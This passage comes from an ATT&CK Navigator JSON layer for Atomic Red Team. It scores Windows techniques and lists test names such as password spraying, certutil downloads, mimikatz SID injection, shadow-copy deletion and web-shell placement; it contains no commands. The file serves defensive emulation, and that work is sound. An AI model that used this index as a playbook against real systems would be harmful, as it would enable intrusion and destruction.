Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- 
certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n- Run Shellcode via Syscall in Go\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":4,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n- ESXi - Brute Force Until Account Lockout\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- 
Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n- Modify Internet Zone Protocol Defaults in Current User Registry - cmd\n- Modify Internet Zone Protocol Defaults in Current User Registry - 
PowerShell\n- Activities To Disable Secondary Authentication Detected By Modified Registry Value.\n- Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.\n- Scarab Ransomware Defense Evasion Activities\n- Disable Remote Desktop Anti-Alias Setting Through Registry\n- Disable Remote Desktop Security Settings Through Registry\n- Disabling ShowUI Settings of Windows Error Reporting (WER)\n- Enable Proxy Settings\n- Set-Up Proxy Server\n- RDP Authentication Level Override\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"comment":"\n- ESXi - Install a custom VIB on an ESXi host\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n- Create a new Windows admin user via .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.001","score":1,"enabled":true,"comment":"\n- Injecting a Macro into the Word Normal.dotm 
Template for Persistence via PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.001/T1137.001.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence (HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic 
Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":78,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- 
ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n- LOLBAS CustomShellHost to Spawn Process\n- Provlaunch.exe Executes Arbitrary Command via Registry Key\n- LOLBAS Msedge to Spawn Process\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive 
invocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - 
Execute Arbitrary DLL\n- Odbcconf.exe - Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":14,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n- Running DLL with .init extension and function\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software 
Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with SysInternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":3,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n- Data Encrypt Using DiskCryptor\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n- Windows - vssadmin Resize Shadowstorage 
Volume\n- Modify VSS Service Permissions\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet 
